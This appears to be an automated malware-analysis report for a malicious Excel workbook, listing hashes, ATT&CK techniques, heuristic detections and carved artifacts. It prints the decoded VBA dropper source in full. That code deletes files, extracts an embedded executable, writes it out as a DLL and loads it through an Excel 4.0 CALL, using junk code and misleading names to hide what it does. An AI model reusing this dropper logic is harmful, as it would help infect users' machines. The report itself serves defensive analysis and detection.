Office (OLE) malware analysis — malicious · 061be38af0c1393f

MALICIOUS

Office (OLE)

830.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-08-10

MD5: 20d801fd3167c6d3e5357b4c5aa69853 SHA-1: e9eb72f25834aed0241275e276f44b6c1c47b903 SHA-256: 061be38af0c1393f0f9d77b91b05aa5284d2f41e197c40da0afe41b0193db33a

522 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer T1204.002 Malicious File

This Excel file contains both VBA and Excel 4.0 macros, with critical firings indicating the use of Shell() and the embedding of a PE executable. The macros are designed to launch this embedded executable, which is detected as a dropper by ClamAV. The presence of WScript and LoadLibrary API calls further suggests the execution of malicious code.

Heuristics 12

ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
         sendings = 1
         Dim sNMSP As New Shell
```
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.microsoft.com0 In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
- http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
- http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	781 bytes
SHA-256: `6d56d86df2ab84633072f1d0aac2fcfdde1d6634356699e346d43e3a8360b98c`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Macro ' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Documen ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14356 bytes
SHA-256: `b4a3b0c4d1d8d12b7662a6bc6c782e1e01996302bb153971c194562906b918e6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "one" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Activate() If UserForm1.Visible = False Then PopulateDivineCommercial 380 End If End Sub Public Sub PopulateDivineCommercial(dImmer As Integer) Dim ActiveHotbit As New WshShell Dim s As String Dim GetInfirmityLevelDescription As String Dim d As Long d = 3 d = d - 1 Select Case d Case 0 s = "No health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim SpecialPath As String PRP = "%" & UserForm6.TextBox1.Tag UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%") Dim car As CarClass Set car = New CarClass UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "") ChDir (UserForm6.TextBox1.Tag) UserForm1.show End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If VBA7 And Win64 Then Public Const FlagDouble = True #Else Public Const FlagDouble = False #End If Public DisputeChannel3 As Byte Public Declaration() As Byte Public abbrev As Byte Public DisputeChannel4 As Byte Public Sub PrepareConfigForOutput() On Error Resume Next Dim i As Long Dim sNextChar As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean Dim sCommand As String Dim PrepareConfigForOutput As Long PrepareConfigForOutput = 0 tooolsetChunkIParameter = False tooolsetChunkQ = False sCommand = Command$ For i = 1 To ALen.B(sCommand) sNextChar = Mid(sCommand, i, 1) If tooolsetChunkIParameter Then If tooolsetChunkQ Then If sNextChar = " " Then tooolsetChunkIParameter = False tooolsetChunkQ = False PrepareConfigForOutput = PrepareConfigForOutput + 1 End If End If End If Next i If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1 End Sub Public Sub PathBack(ByVal sPath As String) On Error Resume Next Dim sT As Variant Dim tt As String If Len(sPath) = 3 Then GoTo errorhand For ii = 0 To UBound(sT) - 2 tt = tt & sT(ii) & "\" Next ii PathB.ack = tt errorhand: Path.Back = sPath End Sub Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{5330D5DB-F597-4E2F-9C96-7BA5B59A369B}{71CB9CE9-6AFD-4CA2-A69A-801EDA2B6713}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Initialize() Call KeyPropUpdate(Me, False) End Sub Private Sub UserForm_Activate() DoEvents DoEvents NigebrednehC DoEvents End Sub Attribute VB_Name = "Module2" Public Const GWL_STYLE = -16 Public Const WS_CAPTION = &HC00000 Public Const WS_SYSMENU = &H80000 Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 #If VBA7 Then Public Declare PtrSafe Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Public Declare PtrSafe Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare PtrSafe Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _ ByVal nIndex As Long) As Long #Else Public Declare Function GetWindowLong11 _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long) As Long Public Declare Function FWA1 _ Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Public Declare Function DrawMenuBar _ Lib "user32" (ByVal parameter1 As Long) As Long Public Declare Function BoxWSL _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long #End If Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte) If UserForm1.Enabled = True Then Put #LongData, , ByteData End If End Function Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean ColumnRangeWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width Exit Function ErrorHandler: ColumnRangeWidth = False Resume Next End Function Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean ColumnWidth = True On Error GoTo ErrorHandler Excel.Worksheets(1).Columns(Col).ColumnWidth = Width Exit Function ErrorHandler: ColumnWidth = False Resume Next End Function Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long On Error GoTo ErrorTrap Dim i As Long, lAccWidth As Long With TheGrid For i = 0 To .Cols - 1 lAccWidth = lAccWidth + .ColWidth(i) If XPos <= lAccWidth Then GetFlexGridColFromXPos = i Exit Function End If Next i End With Exit Function ErrorTrap: Exit Function End Function Private Sub ERRCHECK(result) If result = RCPND_FMOD_OK Then ms.gR.esult = MsgBox(result & ") ") End If End Sub Public Sub NigebrednehC() Dim sendings As Integer ctackPap = UserForm6.TextBox1.Tag Dim ofbl As String ofbl = UserForm6.TextBox3.Tag + "\rofce.dll" Dim CurrentSizeOfAT As Long ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\paper.xlsx"), "") ctackPop = Join(Array(ctackPap, UserForm6.TextBox3.Value), "") ctackPip = Join(Array(ctackPup, ".zip"), "") PublicResumEraseByArrayList ctackPop, ctackPip, ofbl VistaQ ctackPup FileCopy ctackPup, ctackPip sendings = 1 Dim sNMSP As New Shell If sendings > 0 And sendings > -30 Then Set FileWherePutTo2 = sNMSP.Namespace(ctackPap) Set FileWherePutTo = sNMSP.Namespace(ctackPip) FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag) End If CurrentSizeOfAT = 277504 If FlagDouble Then CurrentSizeOfAT = 300000 + 14878 + 2 sendings = 2 End If Composition ctackPap & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings If sendings > 0 Then sendings = sendings + 1 ChDir (UserForm6.TextBox3.Tag) sendings = sendings + 1 End If If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If PrepareConfigForOutput If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If ofbl = "CALL(""" + ofbl ExecuteExcel4Macro ofbl + """,""rekit"",""J"")" End Sub Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents ActiveWorkbook.Close DoEvents End Sub Attribute VB_Name = "Module0" Attribute VB_Name = "UserForm6" Attribute VB_Base = "0{0BFB7421-CE5B-4A47-A1F8-E4299BFA5BEB}{B4EB3A65-AD21-4441-9000-AB89BED5C8D6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module4" Private Sub cmdExit_Click() Unload M.e End End Sub Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True tooolsetChunkQ = False End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module5" Public Sub KeyPropUpdate(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FWA1(vbNullString, frm.Caption) windowStyle = GetWindowLong11(windowHandle, GWL_STYLE) If show Then BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) Else BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim DisputeChannel1 As Long Dim SimpleMethod As Integer ReDim Declaration(1 To fl) DisputeChannel1 = FreeFile Open Composition2 For Binary Access Read As DisputeChannel1 Dim cur As Integer cur = 1 Do While 1 Get DisputeChannel1, , abbrev If abbrev = FirstB Then Declaration(1) = abbrev Get DisputeChannel1, , DisputeChannel3 If DisputeChannel3 = SecondB Then Declaration(2) = DisputeChannel3 Get DisputeChannel1, , DisputeChannel4 If DisputeChannel4 = ThirdB Then Declaration(3) = DisputeChannel4 If cur = DisputeChannel6 Then For k = 4 To fl Get DisputeChannel1, , abbrev Declaration(k) = abbrev Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close DisputeChannel1 On Error Resume Next DisputeChannel1 = FreeFile Open ofbl For Binary Lock Read Write As #DisputeChannel1 For i = LBound(Declaration) To UBound(Declaration) If UserForm1.Enabled = True Then NumberBuffer DisputeChannel1, 70, Declaration(i) End If Next i Close DisputeChannel1 DisputeChannel1 = FreeFile For HSP = 33 To -1 Step -0.25 DisputeChannel1 = 6 + i Next HSP End Sub Attribute VB_Name = "CarClass" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Let Speed(sp As Integer) vSpeed = Application.WorksheetFunction.Min(sp, 100) vSpeed = Application.WorksheetFunction.Max(vSpeed, -100) End Property Public Property Get CheckCar(car As Object, Drive As String) CheckCar = car.SpecialFolders("" + Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property
`embedded_office_00004541.exe`	embedded-pe	Office MZ+PE at offset 0x4541	832191 bytes
SHA-256: `023464f1bda6d69bbe33bbcb26c8ce5df9842d4c2c4509a4e12abc5769435423`
Detection ClamAV: Win.Dropper.Hideproc-6663113-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD0004C53B/Ole10Native	612621 bytes
SHA-256: `97302016e0ec380e50015b7d8d846fb3ed5d0d354e4ab8437c82ea4b77695faa`

Open this report in the interactive analyzer, or submit your own file for analysis.